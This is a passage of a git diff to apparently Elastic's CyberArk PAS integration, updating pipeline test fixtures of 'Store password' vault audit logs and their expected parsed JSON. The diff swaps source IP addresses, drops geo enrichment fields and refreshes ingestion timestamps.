password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"26"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615231182"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614785704"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} <5>1 2021-03-10T14:38:57Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 06:38:57","IsoTimestamp":"2021-03-10T14:38:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615387136"},{"Name":"CurrInd","Value":"1"}]}}}} -<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} -<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} +<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} +<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} <5>1 2021-03-10T23:39:25Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 15:39:25","IsoTimestamp":"2021-03-10T23:39:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountB"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"24"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615419536"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614868762"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"2"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} <5>1 2021-03-14T11:48:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 04:48:26\n 2021-03-14T11:48:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Groups\\WindowsGroup\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 04:48:26","IsoTimestamp":"2021-03-14T11:48:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615722505"},{"Name":"CurrInd","Value":"2"}]}}}} <5>1 2021-03-15T10:12:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:21\n 2021-03-15T10:12:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:21","IsoTimestamp":"2021-03-15T10:12:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"27"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615754905"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1615231204"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} -<5>1 2021-03-15T13:13:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:13:01\n 2021-03-15T13:13:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n Administrator\n Store password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 127.0.0.1\n \n \n \n \n \n Store password\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:13:01","IsoTimestamp":"2021-03-15T13:13:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:13:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:13:01\n 2021-03-15T13:13:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n Administrator\n Store password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 127.0.0.1\n \n \n \n \n \n Store password\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:13:01","IsoTimestamp":"2021-03-15T13:13:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json index dc5819971e1..eb5b8ea3f8b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json @@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301307700Z", + "ingested": "2021-12-09T13:36:44.612758400Z", "original": "\u003c5\u003e1 2021-03-08T10:19:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 02:19:42\",\"IsoTimestamp\":\"2021-03-08T10:19:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615198782\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "294", "kind": "event" @@ -129,7 +129,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301339100Z", + "ingested": "2021-12-09T13:36:44.612767300Z", "original": "\u003c5\u003e1 2021-03-08T18:24:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:49\",\"IsoTimestamp\":\"2021-03-08T18:24:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "294", "kind": "event" @@ -208,7 +208,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301345400Z", + "ingested": "2021-12-09T13:36:44.612772900Z", "original": "\u003c5\u003e1 2021-03-08T19:20:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:02\",\"IsoTimestamp\":\"2021-03-08T19:20:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"26\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615231182\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614785704\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" @@ -276,7 +276,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301349200Z", + "ingested": "2021-12-09T13:36:44.612778200Z", "original": "\u003c5\u003e1 2021-03-10T14:38:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:38:57\",\"IsoTimestamp\":\"2021-03-10T14:38:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615387136\"},{\"Name\":\"CurrInd\",\"Value\":\"1\"}]}}}}", "code": "294", "kind": "event" @@ -289,20 +289,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -322,7 +310,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -332,7 +320,7 @@ "iso_timestamp": "2021-03-10T17:58:06Z", "file": "Root\\PSMServer", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Store password", "message": "Store password", "issuer": "Administrator", @@ -346,8 +334,8 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301352300Z", - "original": "\u003c5\u003e1 2021-03-10T17:58:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:06\",\"IsoTimestamp\":\"2021-03-10T17:58:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:44.612783600Z", + "original": "\u003c5\u003e1 2021-03-10T17:58:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:06\",\"IsoTimestamp\":\"2021-03-10T17:58:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}", "code": "294", "kind": "event" } @@ -359,19 +347,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -391,7 +368,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -401,7 +378,7 @@ "iso_timestamp": "2021-03-10T22:17:26Z", "file": "Root\\PSM-ASR-CYBERARK-WI", "safe": "PSM", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Store password", "message": "Store password", "issuer": "Administrator", @@ -415,8 +392,8 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301355Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:44.612789Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}", "code": "294", "kind": "event" } @@ -494,7 +471,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301357800Z", + "ingested": "2021-12-09T13:36:44.612794500Z", "original": "\u003c5\u003e1 2021-03-10T23:39:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:25\",\"IsoTimestamp\":\"2021-03-10T23:39:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615419536\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" @@ -563,7 +540,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301360600Z", + "ingested": "2021-12-09T13:36:44.612799800Z", "original": "\u003c5\u003e1 2021-03-14T11:48:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 04:48:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T11:48:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Groups\\\\WindowsGroup\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WindowsDesktopLocalAccountsRotationalPolicy\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"InProcess\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" 